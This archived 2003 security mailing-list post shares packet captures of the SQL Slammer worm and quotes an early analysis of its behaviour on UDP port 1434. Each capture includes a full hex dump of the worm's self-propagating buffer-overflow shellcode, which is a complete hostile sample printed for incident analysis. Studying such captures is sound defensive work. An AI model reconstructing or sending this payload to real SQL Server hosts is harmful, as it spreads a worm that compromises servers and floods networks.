Re: W32/SQLSlammer PACKET CAPTURE

From: Graham Rose (graham@AVINT.NET)
Date: 01/25/03

Next message: Ivan Mason: "Re: MS SQL Server Worm?"

Previous message: Marc Maiffret: "SQL Sapphire Worm Analysis"
In reply to: Russ: "W32/SQLSlammer"
Next in thread: Russ: "Re: W32/SQLSlammer"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Sat, 25 Jan 2003 10:50:54 -0330
From: Graham Rose <graham@AVINT.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Looks like I may have a packet capture of this. See below (IP's anonymised)
Does anyone else have a packet capture to compare??
Note that it looks like it's calling specific dlls and system calls

-- 
Graham Rose, CCNA
Network Administrator
Avalon InterConnect & Infotech Canada
graham@infotechcanada.com
graham@avint.net
http://www.avint.net
http://www.superweb.ca
http://www.infotechcanada.com
Frame 2 (418 on wire, 418 captured)
    Arrival Time: Jan 25, 2003 05:29:20.8317
    Time delta from previous packet: 0.000588 seconds
    Time relative to first packet: 0.000588 seconds
    Frame Number: 2
    Packet Length: 418 bytes
    Capture Length: 418 bytes
Ethernet II
    Destination: 01:00:5e:28:66:b2 (01:00:5e:28:66:b2)
    Source: 00:04:75:96:e1:6e (3_96:e1:6e)
    Type: IP (0x0800)
Internet Protocol
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 404
    Identification: 0xf580
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 1
    Protocol: UDP (0x11)
    Header checksum: 0x6264 (correct)
    Source: xxx.xxx.xxx
    Destination: reserved-multicast-range-NOT-delegated.example.com 
(231.40.102.178)
User Datagram Protocol
    Source port: 1804 (1804)
    Destination port: 1434 (1434)
    Length: 384
    Checksum: 0xcdca (correct)
Data (376 bytes)
   0  0100 5e28 66b2 0004 7596 e16e 0800 4500   ..^(f...u..n..E.
  10  0194 f580 0000 0111 6264 c6a5 4bf4 e728   ........bd..K..(
  20  66b2 070c 059a 0180 cdca 0401 0101 0101   f...............
  30  0101 0101 0101 0101 0101 0101 0101 0101   ................
  40  0101 0101 0101 0101 0101 0101 0101 0101   ................
  50  0101 0101 0101 0101 0101 0101 0101 0101   ................
  60  0101 0101 0101 0101 0101 0101 0101 0101   ................
  70  0101 0101 0101 0101 0101 0101 0101 0101   ................
  80  0101 0101 0101 0101 0101 01dc c9b0 42eb   ..............B.
  90  0e01 0101 0101 0101 70ae 4201 70ae 4290   ........p.B.p.B.
  a0  9090 9090 9090 9068 dcc9 b042 b801 0101   .......h...B....
  b0  0131 c9b1 1850 e2fd 3501 0101 0550 89e5   .1...P..5....P..
  c0  5168 2e64 6c6c 6865 6c33 3268 6b65 726e   Qh.dllhel32hkern
  d0  5168 6f75 6e74 6869 636b 4368 4765 7454   QhounthickChGetT
  e0  66b9 6c6c 5168 3332 2e64 6877 7332 5f66   f.llQh32.dhws2_f
  f0  b965 7451 6873 6f63 6b66 b974 6f51 6873   .etQhsockf.toQhs
 100  656e 64be 1810 ae42 8d45 d450 ff16 508d   end....B.E.P..P.
 110  45e0 508d 45f0 50ff 1650 be10 10ae 428b   E.P.E.P..P....B.
 120  1e8b 033d 558b ec51 7405 be1c 10ae 42ff   ...=U..Qt.....B.
 130  16ff d031 c951 5150 81f1 0301 049b 81f1   ...1.QQP........
 140  0101 0101 518d 45cc 508b 45c0 50ff 166a   ....Q.E.P.E.P..j
 150  116a 026a 02ff d050 8d45 c450 8b45 c050   .j.j...P.E.P.E.P
 160  ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d   ........<a...E..
 170  0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d   .@...........)..
 180  0490 01d8 8945 b46a 108d 45b0 5031 c951   .....E.j..E.P1.Q
 190  6681 f178 0151 8d45 0350 8b45 ac50 ffd6   f..x.Q.E.P.E.P..
 1a0  ebca                                      ..
Frame 5 (418 on wire, 418 captured)
    Arrival Time: Jan 25, 2003 05:29:20.8326
    Time delta from previous packet: 0.000141 seconds
    Time relative to first packet: 0.001447 seconds
    Frame Number: 5
    Packet Length: 418 bytes
    Capture Length: 418 bytes
Ethernet II
    Destination: 01:00:5e:5a:09:6f (01:00:5e:5a:09:6f)
    Source: 00:04:75:96:e1:6e (3_96:e1:6e)
    Type: IP (0x0800)
Internet Protocol
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 404
    Identification: 0xf599
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 1
    Protocol: UDP (0x11)
    Header checksum: 0xbb5c (correct)
    Source: xxx.xxx.xxx
    Destination: 235.90.9.111
User Datagram Protocol
    Source port: 1804 (1804)
    Destination port: 1434 (1434)
    Length: 384
    Checksum: 0x26dc (correct)
Data (376 bytes)
   0  0100 5e5a 096f 0004 7596 e16e 0800 4500   ..^Z.o..u..n..E.
  10  0194 f599 0000 0111 bb5c c6a5 4bf4 eb5a   .........\..K..Z
  20  096f 070c 059a 0180 26dc 0401 0101 0101   .o......&.......
  30  0101 0101 0101 0101 0101 0101 0101 0101   ................
  40  0101 0101 0101 0101 0101 0101 0101 0101   ................
  50  0101 0101 0101 0101 0101 0101 0101 0101   ................
  60  0101 0101 0101 0101 0101 0101 0101 0101   ................
  70  0101 0101 0101 0101 0101 0101 0101 0101   ................
  80  0101 0101 0101 0101 0101 01dc c9b0 42eb   ..............B.
  90  0e01 0101 0101 0101 70ae 4201 70ae 4290   ........p.B.p.B.
  a0  9090 9090 9090 9068 dcc9 b042 b801 0101   .......h...B....
  b0  0131 c9b1 1850 e2fd 3501 0101 0550 89e5   .1...P..5....P..
  c0  5168 2e64 6c6c 6865 6c33 3268 6b65 726e   Qh.dllhel32hkern
  d0  5168 6f75 6e74 6869 636b 4368 4765 7454   QhounthickChGetT
  e0  66b9 6c6c 5168 3332 2e64 6877 7332 5f66   f.llQh32.dhws2_f
  f0  b965 7451 6873 6f63 6b66 b974 6f51 6873   .etQhsockf.toQhs
 100  656e 64be 1810 ae42 8d45 d450 ff16 508d   end....B.E.P..P.
 110  45e0 508d 45f0 50ff 1650 be10 10ae 428b   E.P.E.P..P....B.
 120  1e8b 033d 558b ec51 7405 be1c 10ae 42ff   ...=U..Qt.....B.
 130  16ff d031 c951 5150 81f1 0301 049b 81f1   ...1.QQP........
 140  0101 0101 518d 45cc 508b 45c0 50ff 166a   ....Q.E.P.E.P..j
 150  116a 026a 02ff d050 8d45 c450 8b45 c050   .j.j...P.E.P.E.P
 160  ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d   ........<a...E..
 170  0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d   .@...........)..
 180  0490 01d8 8945 b46a 108d 45b0 5031 c951   .....E.j..E.P1.Q
 190  6681 f178 0151 8d45 0350 8b45 ac50 ffd6   f..x.Q.E.P.E.P..
 1a0  ebca                                      ..
On January 25, 2003 09:34 am, you wrote:
I would like to revise my previous statement.
W32/SQLSlammer, as its being called now, does not act like SQL-Spida,
and the mitigators to prevent SQL-Spida are not necessarily effective in
preventing SQLSlammer.
SQLSlammer is delivered entirely in the single connection, 367 bytes of
attack code. It appears to be entirely memory resident, iows, it won't
drop anything. It does not appear to take advantage of weak passwords or
any stored procedures, it simply overflows the buffer and executes.
Also, SQL-Spida attacked 1433, whereas this attacks UDP1434.
If this attack is also employing the SQL Ping bounce described by David
Litchfield last July, then this could account for the amount of
bandwidth being consumed by this. Look in the NTBugtraq archives for
David's email.
There is some discussion occurring that ISPs are blocking this traffic,
so we should see recovery relatively quickly.
So far there have been no reports of SQL 7 or lower being affected.
More as its available.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by TruSecure Corporation
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
TICSA - Anniversary Special - Limited Time
Become TICSA certified for just $221.25 US when you register before 3/31/03
with PROMO "TS0103" at www.2test.com.  NO membership fees, certification
good for 2 years. Price for international delivery just $296.25 US, with
this offer.  Offer cannot be combined with any other special and expires
3/31/03. Visit www.trusecure.com/ticsa for full details.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by TruSecure Corporation
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
TICSA - Anniversary Special - Limited Time
Become TICSA certified for just $221.25 US when you register before 3/31/03
with PROMO "TS0103" at www.2test.com.  NO membership fees, certification
good for 2 years. Price for international delivery just $296.25 US, with
this offer.  Offer cannot be combined with any other special and expires
3/31/03. Visit www.trusecure.com/ticsa for full details.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

Next message: Ivan Mason: "Re: MS SQL Server Worm?"
Previous message: Marc Maiffret: "SQL Sapphire Worm Analysis"
In reply to: Russ: "W32/SQLSlammer"
Next in thread: Russ: "Re: W32/SQLSlammer"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

IP protocol checksum errors
... Frame 3484 ... Time delta from previous packet: ... Capture Length: 254 bytes ... Fragment offset: 0 ...
(comp.os.linux.embedded)
RE: Snort + (OpenBSD or Linux)
... Snort + (OpenBSD or Linux) ... >on the same packet. ... Regarding OpenBSD vs. Linux packet capture performance (this is a really old ...
(Focus-IDS)
[TOOL] WinPcap, the Free Packet Capture Architecture for Windows
... the Free Packet Capture Architecture for Windows ...
(Securiteam)
Re: How to go about developing a TCP Packet Filter
... You can modify and capture packets in LSP's, TDI filters and NDIS IM ... thus you don't know that there was an attempt to send packet. ... Volodymyr M. Shcherbyna, blog: http://www.shcherbyna.com/ ...
(microsoft.public.win32.programmer.kernel)
Re: DHCP issue switching scopes
... Here is a text file dump of a discover/offer packet pair ... I can send the entire capture file ... Time since reference or first frame: ... User Datagram Protocol, Src Port: bootps, Dst Port: ...
(microsoft.public.windows.server.networking)